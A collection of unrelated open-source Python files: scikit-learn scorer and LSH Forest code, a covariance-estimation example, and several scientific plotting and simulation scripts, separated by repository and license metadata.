    """Make a scorer from a performance metric or loss function.

    This factory function wraps scoring functions for use in GridSearchCV
    and cross_val_score. It takes a score function, such as ``accuracy_score``,
    ``mean_squared_error``, ``adjusted_rand_index`` or ``average_precision``
    and returns a callable that scores an estimator's output.

    Read more in the :ref:`User Guide <scoring>`.

    Parameters
    ----------
    score_func : callable,
        Score function (or loss function) with signature
        ``score_func(y, y_pred, **kwargs)``.

    greater_is_better : boolean, default=True
        Whether score_func is a score function (default), meaning high is good,
        or a loss function, meaning low is good. In the latter case, the
        scorer object will sign-flip the outcome of the score_func.

    needs_proba : boolean, default=False
        Whether score_func requires predict_proba to get probability estimates
        out of a classifier.

    needs_threshold : boolean, default=False
        Whether score_func takes a continuous decision certainty.
        This only works for binary classification using estimators that
        have either a decision_function or predict_proba method.

        For example ``average_precision`` or the area under the roc curve
        can not be computed using discrete predictions alone.

    **kwargs : additional arguments
        Additional parameters to be passed to score_func.

    Returns
    -------
    scorer : callable
        Callable object that returns a scalar score; greater is better.

    Examples
    --------
    >>> from sklearn.metrics import fbeta_score, make_scorer
    >>> ftwo_scorer = make_scorer(fbeta_score, beta=2)
    >>> ftwo_scorer
    make_scorer(fbeta_score, beta=2)
    >>> from sklearn.model_selection import GridSearchCV
    >>> from sklearn.svm import LinearSVC
    >>> grid = GridSearchCV(LinearSVC(), param_grid={'C': [1, 10]},
    ...                     scoring=ftwo_scorer)
    """
    if needs_proba and needs_threshold:
        raise ValueError("Set either needs_proba or needs_threshold to True,"
                         " but not both.")
    sign = 1 if greater_is_better else -1
    # Pick the scorer flavour matching the kind of estimator output needed.
    if needs_proba:
        scorer_cls = _ProbaScorer
    elif needs_threshold:
        scorer_cls = _ThresholdScorer
    else:
        scorer_cls = _PredictScorer
    return scorer_cls(score_func, sign, kwargs)
# Standard regression scores
r2_scorer = make_scorer(r2_score)
neg_mean_squared_error_scorer = make_scorer(mean_squared_error,
greater_is_better=False)
deprecation_msg = ('Scoring method mean_squared_error was renamed to '
'neg_mean_squared_error in version 0.18 and will '
'be removed in 0.20.')
mean_squared_error_scorer = make_scorer(mean_squared_error,
greater_is_better=False)
mean_squared_error_scorer._deprecation_msg = deprecation_msg
neg_mean_squared_log_error_scorer = make_scorer(mean_squared_log_error,
greater_is_better=False)
neg_mean_absolute_error_scorer = make_scorer(mean_absolute_error,
greater_is_better=False)
deprecation_msg = ('Scoring method mean_absolute_error was renamed to '
'neg_mean_absolute_error in version 0.18 and will '
'be removed in 0.20.')
mean_absolute_error_scorer = make_scorer(mean_absolute_error,
greater_is_better=False)
mean_absolute_error_scorer._deprecation_msg = deprecation_msg
neg_median_absolute_error_scorer = make_scorer(median_absolute_error,
greater_is_better=False)
deprecation_msg = ('Scoring method median_absolute_error was renamed to '
'neg_median_absolute_error in version 0.18 and will '
'be removed in 0.20.')
median_absolute_error_scorer = make_scorer(median_absolute_error,
greater_is_better=False)
median_absolute_error_scorer._deprecation_msg = deprecation_msg
# Standard Classification Scores
accuracy_scorer = make_scorer(accuracy_score)
f1_scorer = make_scorer(f1_score)
# Score functions that need decision values
roc_auc_scorer = make_scorer(roc_auc_score, greater_is_better=True,
needs_threshold=True)
average_precision_scorer = make_scorer(average_precision_score,
needs_threshold=True)
precision_scorer = make_scorer(precision_score)
recall_scorer = make_scorer(recall_score)
# Score function for probabilistic classification
neg_log_loss_scorer = make_scorer(log_loss, greater_is_better=False,
needs_proba=True)
deprecation_msg = ('Scoring method log_loss was renamed to '
'neg_log_loss in version 0.18 and will be removed in 0.20.')
log_loss_scorer = make_scorer(log_loss, greater_is_better=False,
needs_proba=True)
log_loss_scorer._deprecation_msg = deprecation_msg
# Clustering scores
adjusted_rand_scorer = make_scorer(adjusted_rand_score)
homogeneity_scorer = make_scorer(homogeneity_score)
completeness_scorer = make_scorer(completeness_score)
v_measure_scorer = make_scorer(v_measure_score)
mutual_info_scorer = make_scorer(mutual_info_score)
adjusted_mutual_info_scorer = make_scorer(adjusted_mutual_info_score)
normalized_mutual_info_scorer = make_scorer(normalized_mutual_info_score)
fowlkes_mallows_scorer = make_scorer(fowlkes_mallows_score)
SCORERS = dict(r2=r2_scorer,
neg_median_absolute_error=neg_median_absolute_error_scorer,
neg_mean_absolute_error=neg_mean_absolute_error_scorer,
neg_mean_squared_error=neg_mean_squared_error_scorer,
neg_mean_squared_log_error=neg_mean_squared_log_error_scorer,
median_absolute_error=median_absolute_error_scorer,
mean_absolute_error=mean_absolute_error_scorer,
mean_squared_error=mean_squared_error_scorer,
accuracy=accuracy_scorer, roc_auc=roc_auc_scorer,
average_precision=average_precision_scorer,
log_loss=log_loss_scorer,
neg_log_loss=neg_log_loss_scorer,
# Cluster metrics that use supervised evaluation
adjusted_rand_score=adjusted_rand_scorer,
homogeneity_score=homogeneity_scorer,
completeness_score=completeness_scorer,
v_measure_score=v_measure_scorer,
mutual_info_score=mutual_info_scorer,
adjusted_mutual_info_score=adjusted_mutual_info_scorer,
normalized_mutual_info_score=normalized_mutual_info_scorer,
fowlkes_mallows_score=fowlkes_mallows_scorer)
for name, metric in [('precision', precision_score),
('recall', recall_score), ('f1', f1_score)]:
SCORERS[name] = make_scorer(metric)
for average in ['macro', 'micro', 'samples', 'weighted']:
qualified_name = '{0}_{1}'.format(name, average)
SCORERS[qualified_name] = make_scorer(metric, pos_label=None,
average=average)
| bsd-3-clause |
pyrolysis/low-order-particle | oak-diff.py | 1 | 2887 | """
Calculate and compare difference between 3-D surface and center temperature profiles.
"""
import numpy as np
import matplotlib.pyplot as py

# Data from Comsol 3-D Oak Particle Simulation
# -----------------------------------------------------------------------------

# (file-name key, legend label) for each particle size, smallest first.
# The key is embedded in the data file name 'comsol/<key>tempsOak.txt'.
CASES = [
    ('200', '200 um'),
    ('400', '400 um'),
    ('700', '700 um'),
    ('1400', '1.4 mm'),
    ('2800', '2.8 mm'),
    ('5400', '5.4 mm'),
    ('10000', '10 mm'),
    ('20000', '20 mm'),
]


def load_temp_diff(key):
    """Load one Comsol file and return (time, |Tsurface - Tcenter|).

    Columns 0, 3 and 6 of the file hold time, center temperature and
    surface temperature respectively; the first 5 rows are header.
    """
    fname = 'comsol/{0}tempsOak.txt'.format(key)
    t, _, _, tc, _, _, tsa = np.loadtxt(fname, skiprows=5, unpack=True)
    return t, np.abs(tsa - tc)


# time series and surface/center temperature differences per particle size
times = {}
diffs = {}
for key, _ in CASES:
    times[key], diffs[key] = load_temp_diff(key)

# bar chart data: maximum temperature difference for each particle size
maxDiff = [np.max(diffs[key]) for key, _ in CASES]
xlabels = ('200um', '400um', '700um', '1.4mm', '2.8mm', '5.4mm', '10mm', '20mm')
xloc = range(len(xlabels))

# Plot Results
# -----------------------------------------------------------------------------

py.ion()
py.close('all')


def despine():
    """Hide top/right spines and all tick marks on the current axes."""
    ax = py.gca()
    ax.spines['top'].set_visible(False)
    ax.spines['right'].set_visible(False)
    py.tick_params(axis='both', bottom='off', top='off', left='off', right='off')


# Figure 1: time evolution of the surface/center difference,
# plotted largest particle first so the legend runs large -> small.
py.figure(1)
for key, label in reversed(CASES):
    py.plot(times[key], diffs[key], lw=2, label=label)
py.xlim(0, 40)
py.ylabel('Temperature Difference (K)')
py.xlabel('Time (s)')
py.legend(loc='best', numpoints=1, frameon=False)
py.grid()
despine()

# Figure 2: maximum difference per particle size
py.figure(2)
py.bar(xloc, maxDiff, align='center')
py.xticks(xloc, xlabels)
py.ylabel('Max Temperature Difference (K)')
py.xlabel('Feret Diameter')
py.grid()
despine()
| mit |
RPGOne/scikit-learn | examples/covariance/plot_lw_vs_oas.py | 159 | 2951 | """
=============================
Ledoit-Wolf vs OAS estimation
=============================
The usual covariance maximum likelihood estimate can be regularized
using shrinkage. Ledoit and Wolf proposed a close formula to compute
the asymptotically optimal shrinkage parameter (minimizing a MSE
criterion), yielding the Ledoit-Wolf covariance estimate.
Chen et al. proposed an improvement of the Ledoit-Wolf shrinkage
parameter, the OAS coefficient, whose convergence is significantly
better under the assumption that the data are Gaussian.
This example, inspired from Chen's publication [1], shows a comparison
of the estimated MSE of the LW and OAS methods, using Gaussian
distributed data.
[1] "Shrinkage Algorithms for MMSE Covariance Estimation"
Chen et al., IEEE Trans. on Sign. Proc., Volume 58, Issue 10, October 2010.
"""
print(__doc__)

import numpy as np
import matplotlib.pyplot as plt
from scipy.linalg import toeplitz, cholesky

from sklearn.covariance import LedoitWolf, OAS

# fixed seed so the example is reproducible
np.random.seed(0)
###############################################################################
n_features = 100
# simulation covariance matrix (AR(1) process)
r = 0.1
real_cov = toeplitz(r ** np.arange(n_features))
# Cholesky factor used to color white Gaussian noise with real_cov
coloring_matrix = cholesky(real_cov)

n_samples_range = np.arange(6, 31, 1)
repeat = 100
# MSE and shrinkage coefficient for both estimators,
# one row per sample size, one column per repetition
lw_mse = np.zeros((n_samples_range.size, repeat))
oa_mse = np.zeros((n_samples_range.size, repeat))
lw_shrinkage = np.zeros((n_samples_range.size, repeat))
oa_shrinkage = np.zeros((n_samples_range.size, repeat))
for i, n_samples in enumerate(n_samples_range):
    for j in range(repeat):
        # Gaussian samples with covariance real_cov
        X = np.dot(
            np.random.normal(size=(n_samples, n_features)), coloring_matrix.T)

        lw = LedoitWolf(store_precision=False, assume_centered=True)
        lw.fit(X)
        lw_mse[i, j] = lw.error_norm(real_cov, scaling=False)
        lw_shrinkage[i, j] = lw.shrinkage_

        oa = OAS(store_precision=False, assume_centered=True)
        oa.fit(X)
        oa_mse[i, j] = oa.error_norm(real_cov, scaling=False)
        oa_shrinkage[i, j] = oa.shrinkage_

# plot MSE (mean +/- std over the repetitions)
plt.subplot(2, 1, 1)
plt.errorbar(n_samples_range, lw_mse.mean(1), yerr=lw_mse.std(1),
             label='Ledoit-Wolf', color='navy', lw=2)
plt.errorbar(n_samples_range, oa_mse.mean(1), yerr=oa_mse.std(1),
             label='OAS', color='darkorange', lw=2)
plt.ylabel("Squared error")
plt.legend(loc="upper right")
plt.title("Comparison of covariance estimators")
plt.xlim(5, 31)

# plot shrinkage coefficient
plt.subplot(2, 1, 2)
plt.errorbar(n_samples_range, lw_shrinkage.mean(1), yerr=lw_shrinkage.std(1),
             label='Ledoit-Wolf', color='navy', lw=2)
plt.errorbar(n_samples_range, oa_shrinkage.mean(1), yerr=oa_shrinkage.std(1),
             label='OAS', color='darkorange', lw=2)
plt.xlabel("n_samples")
plt.ylabel("Shrinkage")
plt.legend(loc="lower right")
plt.ylim(plt.ylim()[0], 1. + (plt.ylim()[1] - plt.ylim()[0]) / 10.)
plt.xlim(5, 31)

plt.show()
| bsd-3-clause |
pygeo/pycmbs | pycmbs/plots/violin.py | 1 | 10656 | # -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
import matplotlib.pyplot as plt
import numpy as np
class ViolinPlot(object):
    """
    generate ViolinPlot

    NOTE: this module targets Python 2 (print statements, xrange).

    References
    ----------
    inspired by
    [1] http://pyinsci.blogspot.de/2009/09/violin-plot-with-matplotlib.html
    [2] http://en.wikipedia.org/wiki/Violin_plot
    [3] http://statsmodels.sourceforge.net/devel/generated/statsmodels.graphics.boxplots.violinplot.html
    [4] http://nbviewer.ipython.org/github/EnricoGiampieri/dataplot/blob/master/statplot.ipynb
    """

    def __init__(self, data, data2=None, labels=None, ax=None,
                 boxplot=True, figsize=(10, 6), sortlabels=False):
        """
        Parameters
        ----------
        data : ndarray/dict
            data to be plotted. needs to be of geometry [ngroups, nsamp]
            where ngroups is the the number of different groups to
            be plotted and would correspond also to len(labels)
        data2 : ndarray/dict
            second dataset to be plotted
        labels : list
            labels to be used for xticks
        ax : axis
            when provided, then the plot is generated on the particular
            axis
        boxplot : bool
            plot boxplot (only used by the classic plot)
        figsize : tuple
            figure size
        sortlabels : bool
            sort labels in ascending order
        """
        self.data = data
        self.data2 = data2
        if labels is None:
            # default labels are simply the group indices
            self.labels = range(len(self.data))
        else:
            self.labels = labels
        if sortlabels:
            self.labels.sort()
        if ax is None:
            # no axis given: create a new figure with fixed margins
            fig = plt.figure(figsize=figsize)
            rect = [0.1, 0.2, 0.8, 0.7]  # l,b,w,h
            self.ax = fig.add_axes(rect)
        else:
            self.ax = ax
        self.boxplot = boxplot

        # check
        self._check()

    def _check(self):
        """
        routine to check internal consistency
        """
        if self.data is not None:
            if self.data2 is None:
                # a single dataset requires one label per data group
                if len(self.labels) != len(self.data):
                    print len(self.labels)
                    print self.labels
                    print len(self.data)
                    raise ValueError('Invalid geometry of labels and data!')

    def plot(self, alpha=0.3, classic=False):
        """
        plot ViolinPlot

        Parameters
        ----------
        alpha : float
            alpha value for area fill
        classic : bool
            make classic (symmetric) violin plot instead of the
            two-sided comparison plot
        """
        if self.data is None:
            raise ValueError('Data is None and can therefore not be plotted!')
        if classic:
            self._plot_classic(alpha=alpha)
        else:
            self._plot_two_sided()
        self._set_xticks()

    def _plot_half_violin(self, data, pos, left=False, **kwargs):
        """
        plot half violin
        inspired by [4]

        Parameters
        ----------
        data : ndarray
            array with data (only valid data, no masked array)
        pos : ndarray
            position (x coordinate of the violin's center line)
        left : bool
            specifies if the plot should be on the left side
            NOTE(review): left=True offsets the profile toward +x;
            verify the naming matches the intended visual side
        """
        from scipy.stats import gaussian_kde
        # a KDE needs at least two samples
        if len(data) < 2:
            return None
        amplitude = kwargs.pop('amplitude', 0.33)
        # density curve evaluated on 101 points spanning the data range
        x = np.linspace(min(data), max(data), 101)
        v = gaussian_kde(data).evaluate(x)
        # normalize to `amplitude`; the sign selects the side
        v = v / v.max() * amplitude * (1 if left else -1)
        kwargs.setdefault('facecolor', 'r')
        kwargs.setdefault('alpha', 0.33)
        return self.ax.fill_betweenx(x, pos, pos + v, **kwargs)

    def _plot_two_sided(self, color1='b', color2='b'):
        """
        violin plot with two sides
        inspired by [4]

        Parameters
        ----------
        color1 : str
            color for left plot
        color2 : str
            color for right plot (switched to 'r' when a distinct
            second dataset is plotted)
        """
        # with no second dataset, mirror the first one on both sides
        data2 = self.data2 if self.data2 is not None else self.data
        if self.labels is not None:
            labels = self.labels
            positions = range(len(labels))
        else:
            positions = self._get_positions()
            labels = positions
            self.labels = labels
        for pos, key in zip(positions, labels):
            # dict-like data is looked up by label, sequences by position
            if isinstance(self.data, dict):
                if key in self.data.keys():
                    d1 = self.data[key]
                else:
                    d1 = None
            else:
                d1 = self.data[pos]
            if isinstance(data2, dict):
                # in case that data is a dict
                if key in data2.keys():
                    d2 = data2[key]
                else:
                    d2 = None
            else:
                d2 = data2[pos]
            if self.data is not data2:
                color2 = 'r'
            # generate plot
            if d1 is not None:
                self._plot_half_violin(d1, pos, left=False, facecolor=color1)
            if d2 is not None:
                self._plot_half_violin(d2, pos, left=True, facecolor=color2)
            # division line between the two half
            if (d1 is not None) and (d2 is not None):
                # NOTE(review): '&' binds tighter than '>', so this
                # condition evaluates as len(d1) > (0 & len(d2)), i.e.
                # only len(d1) > 0 is checked -- 'and' was likely meant
                if len(d1) > 0 & len(d2) > 0:
                    self.ax.plot([pos] * 2, [min(min(d1), min(d2)),
                                 max(max(d1), max(d2))], '-', color='grey')

    def _set_xticks(self, rotation=30.):
        """
        set ticklabels (one tick per data group)
        """
        self.ax.set_xticks(range(len(self.labels)))
        self.ax.set_xticklabels(self.labels, rotation=rotation)

    def _get_positions(self):
        """
        get positions of xticks (simply the group indices)
        """
        return range(len(self.data))

    def _plot_classic(self, alpha):
        """
        create classical violin plots on an axis
        http://pyinsci.blogspot.de/2009/09/violin-plot-with-matplotlib.html

        Parameters
        ----------
        alpha : float
            alpha value for area fill
        """
        from scipy.stats import gaussian_kde
        pos = self._get_positions()
        dist = max(pos) - min(pos)
        # violin half-width: 15% of the span, capped at 0.5
        w = min(0.15 * max(dist, 1.0), 0.5)
        for d, p in zip(self.data, pos):
            if not np.all(d == 0.):  # avoid singular matrices
                k = gaussian_kde(d)  # calculates the kernel density
                m = k.dataset.min()  # lower bound of violin
                M = k.dataset.max()  # upper bound of violin
                x = np.arange(m, M, (M - m) / 100.)  # support for violin
                v = k.evaluate(x)  # violin profile (density curve)
                v = v / v.max() * w  # scaling the violin to the available space
                # symmetric fill on both sides of the position
                self.ax.fill_betweenx(x, p, v + p, facecolor='y', alpha=alpha)
                self.ax.fill_betweenx(x, p, -v + p, facecolor='y', alpha=alpha)
        if self.boxplot:
            self.ax.boxplot(self.data, notch=1, positions=pos,
                            vert=True, sym='')
class ViolinPlotBins(ViolinPlot):
    """
    Violinplot for binned data. Instead of plotting a Violin plot for
    each group of data, this class flattens a data array, sorts the
    values into bins and draws one violin per bin.
    """

    def __init__(self, data, data2=None, bins=None, **kwargs):
        """
        Parameters
        ----------
        data : ndarray
            data to be plotted. Can be of any geometry. Data is however
            flattened and then rearranged according to the bins.
        data2 : ndarray
            optional second dataset to be plotted; may be None
        bins : ndarray
            [obligatory]
            bins for the data. the bins correspond to the lower boundary
            of the bin interval. Thus e.g.
            [-1., 2., 5.] corresponds to intervals defined as
            -1 <= x < 2
            2 <= x < 5
            x > 5
        """
        self.bins = bins
        self._check_bins()
        if 'labels' in kwargs.keys():
            raise ValueError('ERROR: labels can not be provided for this class!')
        super(ViolinPlotBins, self).__init__(self._remap_data(data),
                                             self._remap_data(data2),
                                             labels=self._remap_labels(),
                                             **kwargs)

    def _remap_labels(self):
        """
        format label strings, one per bin lower boundary
        """
        return ['>=' + str(b) for b in self.bins]

    def _remap_data(self, x, bins=None):
        """
        Remap and bin data.

        Flattens the data and groups the values by self.bins.

        Parameters
        ----------
        x : ndarray or None
            data array (will be flattened); None is passed through so
            that an omitted second dataset keeps working
        bins : ndarray
            unused, kept for backwards compatibility of the signature

        Returns
        -------
        data : list or None
            of structure [nbins, data_per_bin]
        """
        # BUGFIX: data2 defaults to None in __init__; previously this
        # crashed with AttributeError on None.flatten()
        if x is None:
            return None
        self._check_bins()
        x = x.flatten()
        data = []  # TODO this is slow how to do better?
        for i in xrange(len(self.bins) - 1):
            lb = self.bins[i]
            ub = self.bins[i + 1]
            data.append(x[(x >= lb) & (x < ub)])
        # overflow bin: everything at or above the last boundary.
        # BUGFIX: use bins[-1] explicitly instead of the loop variable,
        # which was undefined when only one boundary was given.
        data.append(x[(x >= self.bins[-1])])
        return data

    def _check_bins(self):
        """
        validate that bins were provided in strictly ascending order
        """
        if self.bins is None:
            raise ValueError('ERROR: bins need to be provided!')
        if np.any(np.diff(self.bins) <= 0.):
            raise ValueError('ERROR: bins are not in ascending order!')
def _classic_example():
    """
    Demonstrate the different violin plot flavours.

    Draws a classic (symmetric) plot, a two-sided plot with custom
    labels, a two-sided comparison of two datasets and a binned violin
    plot, then shows all figures.
    """
    plt.close('all')

    positions = range(5)

    # classic, symmetric violin plot
    samples = [np.random.normal(size=100) for _ in positions]
    classic = ViolinPlot(samples)
    classic.plot(classic=True)

    # two-sided plot of a single dataset with custom labels
    samples = [np.random.normal(size=100) for _ in positions]
    labelled = ViolinPlot(samples, labels=['A', 'B', 'C', 'D', 'E'])
    labelled.plot()

    # two-sided comparison of two different datasets
    samples = [np.random.normal(size=100) for _ in positions]
    other = [np.random.normal(size=100) for _ in positions]
    compare = ViolinPlot(samples, data2=other,
                         labels=['A', 'B', 'C', 'D', 'E'])
    compare.plot()

    # example with binned data
    first = np.random.random((10, 20, 30)) * 6. - 3.
    second = np.random.random((40, 50, 60)) * 6. - 3.
    binned = ViolinPlotBins(first, data2=second,
                            bins=np.linspace(-3., 3., 11))
    binned.plot()

    plt.show()


if __name__ == '__main__':
    _classic_example()
| mit |
freedomflyer/test | lab1/plotting.py | 1 | 2686 | import optparse
import sys
import matplotlib
matplotlib.use('Agg')
from pylab import *
import matplotlib.patches as mpatches
# Class that generates fake data and plots several example graphs
class Plotter:
    """Generate fake data and render several example matplotlib graphs.

    Relies on the pylab star-import at module level (plot, clf,
    savefig, random, average, ...). Each plotting method writes a PNG
    to the current working directory.
    """

    def __init__(self):
        # create some fake data
        self.x = []    # x values 0..9
        self.y = []    # for each x, a list of 100 noisy samples
        self.all = []  # every generated sample, flattened
        # x ranges from 0 to 9
        for i in range(0,10):
            self.x.append(i)
            vals = []
            # each x value has 100 random values of X + random(0,10)
            for j in range(0,100):
                val = i + 10*random()
                vals.append(val)
                # keep track of all values ever generated
                self.all.append(val)
            self.y.append(vals)
        # keep track of the averages for each X
        self.averages = []
        for array in self.y:
            self.averages.append(average(array))

    def equationPlot(self):
        """ Create a line graph of an equation. """
        clf()
        # x stops just short of 10 to avoid division by zero
        x = np.arange(0,9.9,0.1)
        plot(x,1/(10-x))
        xlabel('X')
        ylabel('1/(10-x)')
        savefig('equation.png')

    def linePlot(self):
        """ Create a line graph of the per-x averages. """
        clf()
        plot(self.x,self.averages)
        xlabel('X Label (units)')
        ylabel('Y Label (units)')
        savefig('line.png')

    def linePlotData(self,xdata, ydata, xname, yname):
        """ Create a line graph comparing measured data to M/M/1 theory. """
        clf()
        #theoretical
        # queueing delay W = (1/(2*mu)) * rho/(1-rho)
        # NOTE(review): mu is hard-coded as 1e6/(1000*8), i.e. a 1 Mbps
        # link with 1000-byte packets -- confirm against the lab setup
        rho = np.arange(0,1,1.0/100)
        mu = 1000000.0 / (1000.0 * 8.0)
        plot(rho,(1/(2*mu))*(rho/(1-rho)),label='Theory',color="green")
        #actual
        plot(xdata, ydata,label="Average",color="blue")
        legend(loc='upper left')
        #theoretical
        xlabel(xname)
        ylabel(yname)
        savefig('throughput.png')

    def boxPlot(self):
        """ Create a box plot. """
        clf()
        boxplot(self.y,positions=self.x,widths=0.5)
        xlabel('X Label (units)')
        ylabel('Y Label (units)')
        savefig('boxplot.png')

    def combinedPlot(self):
        """ Create a graph that includes a line plot and a boxplot. """
        clf()
        # plot the line
        plot(self.x,self.averages)
        # plot the boxplot
        boxplot(self.y,positions=self.x,widths=0.5)
        xlabel('X Label (units)')
        ylabel('Y Label (units)')
        savefig('combined.png')

    def histogramPlot(self):
        """ Create a histogram of all generated samples. """
        clf()
        hist(self.all,bins=range(0,20),rwidth=0.8)
        savefig('histogram.png')
savefig('histogram.png')
if __name__ == '__main__':
    # generate every example figure in sequence
    p = Plotter()
    p.equationPlot()
    p.linePlot()
    p.boxPlot()
    p.combinedPlot()
p.histogramPlot() | gpl-2.0 |
zingale/pyro2 | compressible/problems/logo.py | 2 | 2297 | from __future__ import print_function
import sys
import mesh.patch as patch
import numpy as np
from util import msg
import matplotlib.pyplot as plt
def init_data(my_data, rp):
    """ initialize the logo problem

    Renders the word "pyro" into a tiny matplotlib figure, samples the
    rendered image onto the grid as a high-density region, and puts a
    small amount of energy into each corner zone to set off explosions.

    Parameters
    ----------
    my_data : patch.CellCenterData2d
        simulation data holding density, momenta and energy
    rp : runtime parameters object
        provides the EOS gamma via get_param("eos.gamma")
    """

    msg.bold("initializing the logo problem...")

    # make sure that we are passed a valid patch object
    if not isinstance(my_data, patch.CellCenterData2d):
        print("ERROR: patch invalid in logo.py")
        print(my_data.__class__)
        sys.exit()

    # create the logo
    myg = my_data.grid

    # render the text at a resolution matching the grid (nx pixels wide)
    fig = plt.figure(2, (0.64, 0.64), dpi=100*myg.nx/64)
    fig.add_subplot(111)

    fig.text(0.5, 0.5, "pyro", transform=fig.transFigure, fontsize="16",
             horizontalalignment="center", verticalalignment="center")

    plt.axis("off")

    fig.canvas.draw()

    # np.fromstring on raw bytes is deprecated -- use frombuffer instead
    # (the arithmetic below makes a new writable array anyway)
    data = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)
    data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))

    # invert and normalize the green channel, rotate into grid orientation
    logo = np.rot90(np.rot90(np.rot90((256-data[:, :, 1])/255.0)))

    # get the density, momenta, and energy as separate variables
    dens = my_data.get_var("density")
    xmom = my_data.get_var("x-momentum")
    ymom = my_data.get_var("y-momentum")
    ener = my_data.get_var("energy")

    # initialize the components, remember, that ener here is rho*eint
    # + 0.5*rho*v**2, where eint is the specific internal energy
    # (erg/g)
    dens[:, :] = 1.0
    xmom[:, :] = 0.0
    ymom[:, :] = 0.0

    # set the density in the logo zones to be really large
    logo_dens = 50.0
    dens.v()[:, :] = logo[:, :] * logo_dens

    # pressure equilibrium
    gamma = rp.get_param("eos.gamma")

    p_ambient = 1.e-5
    ener[:, :] = p_ambient/(gamma - 1.0)

    # explosion: deposit energy in the four corner zones
    ener[myg.ilo, myg.jlo] = 1.0
    ener[myg.ilo, myg.jhi] = 1.0
    ener[myg.ihi, myg.jlo] = 1.0
    ener[myg.ihi, myg.jhi] = 1.0
def finalize():
    """ print out any information to the user at the end of the run """

    # use a local name that does not shadow the ``msg`` module imported
    # at the top of this file (``from util import msg``)
    note = """
          The script analysis/sedov_compare.py can be used to analyze these
          results.  That will perform an average at constant radius and
          compare the radial profiles to the exact solution.  Sample exact
          data is provided as analysis/cylindrical-sedov.out
          """

    print(note)
| bsd-3-clause |
marcocaccin/scikit-learn | sklearn/neighbors/approximate.py | 30 | 22370 | """Approximate nearest neighbor search"""
# Author: Maheshakya Wijewardena <maheshakya.10@cse.mrt.ac.lk>
# Joel Nothman <joel.nothman@gmail.com>
import numpy as np
import warnings
from scipy import sparse
from .base import KNeighborsMixin, RadiusNeighborsMixin
from ..base import BaseEstimator
from ..utils.validation import check_array
from ..utils import check_random_state
from ..metrics.pairwise import pairwise_distances
from ..random_projection import GaussianRandomProjection
__all__ = ["LSHForest"]
HASH_DTYPE = '>u4'  # big-endian unsigned 32-bit integers hold the hashes
MAX_HASH_SIZE = np.dtype(HASH_DTYPE).itemsize * 8  # hash length in bits (32)
def _find_matching_indices(tree, bin_X, left_mask, right_mask):
"""Finds indices in sorted array of integers.
Most significant h bits in the binary representations of the
integers are matched with the items' most significant h bits.
"""
left_index = np.searchsorted(tree, bin_X & left_mask)
right_index = np.searchsorted(tree, bin_X | right_mask,
side='right')
return left_index, right_index
def _find_longest_prefix_match(tree, bin_X, hash_size,
                               left_masks, right_masks):
    """Find the longest prefix match in tree for each query in bin_X

    Most significant bits are considered as the prefix.

    Implemented as a binary search over the prefix length, vectorized
    across all queries: lo/hi bracket the candidate prefix length for
    each query and res records the best (longest) matching length found.
    """
    hi = np.empty_like(bin_X, dtype=np.intp)
    hi.fill(hash_size)
    lo = np.zeros_like(bin_X, dtype=np.intp)
    res = np.empty_like(bin_X, dtype=np.intp)

    # first probe at the full hash length: queries with an exact-length
    # match are done immediately (lo == hi stops their search)
    left_idx, right_idx = _find_matching_indices(tree, bin_X,
                                                 left_masks[hi],
                                                 right_masks[hi])
    found = right_idx > left_idx
    res[found] = lo[found] = hash_size

    r = np.arange(bin_X.shape[0])
    kept = r[lo < hi]  # indices remaining in bin_X mask
    while kept.shape[0]:
        # midpoint prefix length per still-active query
        mid = (lo.take(kept) + hi.take(kept)) // 2
        left_idx, right_idx = _find_matching_indices(tree,
                                                     bin_X.take(kept),
                                                     left_masks[mid],
                                                     right_masks[mid])
        # a non-empty slice means the mid-length prefix matches
        found = right_idx > left_idx
        mid_found = mid[found]
        # match at mid: record it and search longer prefixes
        lo[kept[found]] = mid_found + 1
        res[kept[found]] = mid_found
        # no match at mid: search shorter prefixes
        hi[kept[~found]] = mid[~found]

        kept = r[lo < hi]
    return res
class ProjectionToHashMixin(object):
    """Turn a transformed real-valued array into packed 32-bit hashes.

    The sign of every projected component contributes one bit; the bits
    are packed into unsigned 32-bit integers (dtype HASH_DTYPE).
    """

    @staticmethod
    def _to_hash(projected):
        """Pack the sign bits of ``projected`` into one or more uint32
        hashes per row."""
        if projected.shape[1] % 8 != 0:
            raise ValueError('Require reduced dimensionality to be a multiple '
                             'of 8 for hashing')
        # XXX: perhaps non-copying operation better
        sign_bits = (projected > 0).astype(int)
        packed = np.packbits(sign_bits).view(dtype=HASH_DTYPE)
        return packed.reshape(projected.shape[0], -1)

    def fit_transform(self, X, y=None):
        """Fit the underlying projection, then hash ``X``."""
        self.fit(X)
        return self.transform(X)

    def transform(self, X, y=None):
        """Project ``X`` with the parent transformer and hash the result."""
        projected = super(ProjectionToHashMixin, self).transform(X)
        return self._to_hash(projected)
class GaussianRandomProjectionHash(ProjectionToHashMixin,
                                   GaussianRandomProjection):
    """Use GaussianRandomProjection to produce a cosine LSH fingerprint"""
    def __init__(self,
                 n_components=8,
                 random_state=None):
        # n_components is the fingerprint length in bits; it must be a
        # multiple of 8 so ProjectionToHashMixin can pack it into bytes
        super(GaussianRandomProjectionHash, self).__init__(
            n_components=n_components,
            random_state=random_state)
def _array_of_arrays(list_of_arrays):
"""Creates an array of array from list of arrays."""
out = np.empty(len(list_of_arrays), dtype=object)
out[:] = list_of_arrays
return out
class LSHForest(BaseEstimator, KNeighborsMixin, RadiusNeighborsMixin):
"""Performs approximate nearest neighbor search using LSH forest.
LSH Forest: Locality Sensitive Hashing forest [1] is an alternative
method for vanilla approximate nearest neighbor search methods.
LSH forest data structure has been implemented using sorted
arrays and binary search and 32 bit fixed-length hashes.
Random projection is used as the hash family which approximates
cosine distance.
The cosine distance is defined as ``1 - cosine_similarity``: the lowest
value is 0 (identical point) but it is bounded above by 2 for the farthest
points. Its value does not depend on the norm of the vector points but
only on their relative angles.
Read more in the :ref:`User Guide <approximate_nearest_neighbors>`.
Parameters
----------
n_estimators : int (default = 10)
Number of trees in the LSH Forest.
min_hash_match : int (default = 4)
lowest hash length to be searched when candidate selection is
performed for nearest neighbors.
n_candidates : int (default = 10)
Minimum number of candidates evaluated per estimator, assuming enough
items meet the `min_hash_match` constraint.
n_neighbors : int (default = 5)
Number of neighbors to be returned from query function when
it is not provided to the :meth:`kneighbors` method.
radius : float, optinal (default = 1.0)
Radius from the data point to its neighbors. This is the parameter
space to use by default for the :meth`radius_neighbors` queries.
